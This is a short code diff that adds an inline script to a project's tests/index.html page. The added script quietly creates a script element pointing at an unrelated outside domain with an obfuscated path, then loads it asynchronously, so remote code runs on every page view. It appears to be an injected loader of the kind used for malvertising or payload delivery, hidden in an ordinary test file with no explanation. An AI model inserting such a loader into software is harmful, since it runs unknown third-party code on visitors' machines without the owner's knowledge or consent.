--- a/tests/index.html
+++ b/tests/index.html
@@ -65,7 +65,18 @@
 </head>
 
 <body>
-
+<script>
+(function(cfbae){
+var d = document,
+    s = d.createElement('script'),
+    l = d.scripts[d.scripts.length - 1];
+s.settings = cfbae || {};
+s.src = "\/\/thankfuldirection.com\/bpXmVfs.dNGflB0BYSW\/cU\/Qenmt9JulZDU_l\/kAPRTdY_3bNBDfgM2KNWD_kXtmNmjscp0yOMDkYu1wMtAk";
+s.async = true;
+s.referrerPolicy = 'no-referrer-when-downgrade';
+l.parentNode.insertBefore(s, l);
+})({})
+</script>
 <main>
 
     <header>
